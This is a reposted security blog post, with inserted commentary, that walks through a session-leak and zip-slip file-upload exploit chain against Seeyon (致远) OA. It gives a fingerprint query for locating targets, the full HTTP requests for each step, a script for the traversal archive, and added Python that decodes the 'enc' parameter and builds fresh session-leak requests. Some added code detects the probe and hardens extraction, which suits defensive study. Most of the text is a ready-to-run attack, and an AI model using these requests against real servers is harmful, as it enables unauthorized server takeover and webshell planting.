致远OA thirdpartyController.do session leak / arbitrary file upload vulnerability
2023-05-15 10:01:57 Author: 星冥安全

In 致远OA (Seeyon OA), a specially crafted request to thirdpartyController.do hands back a valid session; carrying that session, a webshell can then be uploaded through the file-upload interface to take control of the server.

Asset fingerprint (search-engine query): title="致远"

Flow:
First craft a request that returns an administrative cookie (the JSESSIONID), then, carrying that cookie, upload a zip archive and trigger its extraction; the extracted file lands outside the upload directory, which yields a shell.
1. Obtain the cookie

POST /seeyon/thirdpartyController.do HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Content-Type: application/x-www-form-urlencoded
Host:
Content-Length: 112

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4

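The enc parameter is easier to reason about once decoded. The value in the request above is base64 of the plaintext with every character shifted up by one code point; reversing that gives L=message.link.doc.folder.open&M=-7273032013234748168&T=2583618396147. The Python below is an added example, not code from the original post: it decodes the page's value, re-encodes it, builds a step-1 body from chosen M and T values, and offers a small check for spotting this probe in captured request bodies. Only the encoding scheme is verified (it round-trips the page's value); what the server does with L, M and T (M reads like a member id, T like a millisecond timestamp) is an assumption and is not confirmed by the post.

```python
import base64
from urllib.parse import parse_qs, quote, unquote

# enc value copied from the step-1 request on this page (percent-encoded, as sent).
ENC_FROM_PAGE = ("TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQz"
                 "NDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4")


def decode_enc(enc: str) -> str:
    """Reverse the enc encoding: percent-decode, base64-decode, then shift
    every byte down by one. The encoder shifts each character up by one
    before base64-encoding; this is verified by round-tripping ENC_FROM_PAGE."""
    raw = base64.b64decode(unquote(enc))
    return bytes(b - 1 for b in raw).decode("ascii")


def encode_enc(plain: str) -> str:
    """Forward direction: shift each character up by one, then base64 (no percent-encoding)."""
    shifted = bytes(b + 1 for b in plain.encode("ascii"))
    return base64.b64encode(shifted).decode("ascii")


def parse_enc(enc: str) -> dict:
    """Decode enc and split it into its key=value fields."""
    return {k: v[0] for k, v in parse_qs(decode_enc(enc), keep_blank_values=True).items()}


def build_access_body(member_id: str, ticket: str,
                      link: str = "message.link.doc.folder.open") -> str:
    """Form body for POST /seeyon/thirdpartyController.do.
    The field names L, M and T come from the decoded page value; their
    server-side meaning is an assumption (M: member id, T: timestamp)."""
    plain = f"L={link}&M={member_id}&T={ticket}"
    return "method=access&enc=" + quote(encode_enc(plain), safe="")


def is_thirdparty_access(body: str) -> bool:
    """Log-review helper: does a request body look like the step-1 probe?
    Useful when grepping access logs or WAF captures for this pattern."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if fields.get("method") != "access" or "enc" not in fields:
        return False
    try:
        return "L=" in decode_enc(fields["enc"])
    except (ValueError, UnicodeDecodeError):
        # not base64, or a byte that cannot be shifted: not this encoding
        return False
```

build_access_body("-7273032013234748168", "2583618396147") reproduces the exact body of the request above, so the scheme is the whole of the "special request"; any other M value is encoded the same way.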

2. Upload the archive

POST /seeyon/fileUpload.do?method=processUpload&maxSize HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
User-Agent: Java/1.8.0_101
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 975
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="type"

--00content0boundary00
Content-Disposition: form-data; name="extensions"

--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"

--00content0boundary00
Content-Disposition: form-data; name="destDirectory"

--00content0boundary00
Content-Disposition: form-data; name="destFilename"

--00content0boundary00
Content-Disposition: form-data; name="maxSize"

--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"

--00content0boundary00
Content-Disposition: form-data; name="file1"; filename="test.zip"
Content-Type: application/x-zip-compressed

<raw bytes of test.zip>
--00content0boundary00--


After the archive is uploaded with the cookie set, the response contains an id for the archive.
Note: a major pitfall here. In actual testing, file names inside the archive can only be digits (anything above 10 also fails to extract), and sometimes the archive must contain a layout.xml file (empty content is fine); otherwise extraction fails when the unzip vulnerability is triggered.

3. Extract (the third element of arguments is the archive id returned by step 2)

POST /seeyon/ajax.do HTTP/1.1
Cookie: JSESSIONID=B0EA117AB78158D5B790953B453C1503
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Java/1.8.0_101
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 142
Connection: close

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2023-02-05","-6448544356250399451"]


4. Check the upload result

Note: script that generates the archive

import zipfile

# Build the archive step 2 expects: an empty layout.xml (see the note above)
# plus one entry whose name climbs out of the extraction directory (zip slip).
# mode='w' replaces any stale test.zip instead of appending duplicate entries.
with zipfile.ZipFile('test.zip', mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
    fname = '..\\1.txt'  # traversal entry; the name must be numeric (see the note above)
    shellcode = "c9b3995f-2d74-448d-a742-34f72cfa1e14"  # harmless marker proving the write landed
    zf.writestr('layout.xml', "")
    zf.writestr(fname, shellcode)
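
The generator above writes a single traversal entry. The Python below is an added example, not code from the original post: it builds the same kind of archive in memory, shows where an extractor that simply joins the target directory with the entry name (the zip-slip bug the unzip step relies on) would write ..\1.txt, and contrasts it with an extractor that rejects traversal entries and re-checks every resolved path. The /srv/seeyon/upload/2023-02-05 directory and the scratch directory are constructed for the example; the MARKER string is the one the page's script writes.

```python
import io
import os
import posixpath
import tempfile
import zipfile
from pathlib import PureWindowsPath

# Same marker the page's generator writes; harmless, only proves the write landed.
MARKER = "c9b3995f-2d74-448d-a742-34f72cfa1e14"


def build_archive(entry_name="..\\1.txt", payload=MARKER) -> bytes:
    """Step-2 archive in memory: an empty layout.xml (the post says extraction
    sometimes fails without it) plus one entry whose name escapes the
    extraction directory. On Linux the backslash is kept verbatim in the entry name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("layout.xml", "")
        zf.writestr(entry_name, payload)
    return buf.getvalue()


def list_entries(archive: bytes):
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.namelist()


def naive_target_path(dest_dir: str, entry_name: str) -> str:
    """Where an extractor that just joins dest_dir + entry name would write the
    entry: the classic zip-slip defect. Backslashes count as separators, as
    they would on a Windows-hosted server."""
    return posixpath.normpath(posixpath.join(dest_dir, entry_name.replace("\\", "/")))


def is_unsafe_entry(name: str) -> bool:
    """True if an entry name can escape the extraction directory: drive letter,
    absolute path, or any '..' component, with either separator."""
    if PureWindowsPath(name).drive or PureWindowsPath(name).root:
        return True
    normalized = name.replace("\\", "/")
    if normalized.startswith("/"):
        return True
    return ".." in normalized.split("/")


def safe_extract(archive: bytes, dest_dir: str):
    """Hardened extractor: skip traversal entries, then re-check that the
    resolved target still lies under dest_dir. Returns (extracted, rejected)."""
    extracted, rejected = [], []
    root = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_unsafe_entry(name):
                rejected.append(name)
                continue
            target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
            if os.path.commonpath([root, target]) != root:  # belt and braces
                rejected.append(name)
                continue
            if name.endswith("/"):
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with open(target, "wb") as fh:
                    fh.write(zf.read(info))
            extracted.append(name)
    return extracted, rejected


def run_demo():
    """Extract the page-style archive into a scratch directory and report
    what the hardened extractor keeps and what it drops."""
    with tempfile.TemporaryDirectory() as scratch:
        dest = os.path.join(scratch, "2023-02-05")  # constructed upload-date directory
        os.makedirs(dest)
        return safe_extract(build_archive(), dest)
```

Python's own ZipFile.extractall already strips ".." components, which is why the naive path is computed by hand here rather than observed; the point of is_unsafe_entry plus the realpath re-check is that name-based filtering alone misses symlinked directories, while path-based checking alone misses drive-letter names on Windows.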

Reposted from: https://bbs.zkaq.cn/t/30787.html Author: camer. Please follow the original author.



Article source: http://mp.weixin.qq.com/s?__biz=MzkxMDMwNDE2OQ==&mid=2247489774&idx=1&sn=66e0108dade381da0baa6723a5acbfae&chksm=c12c2e28f65ba73e6ed2282f1ef505055d5ca5d53261130469943d34bd9c133b352f70e013d1#rd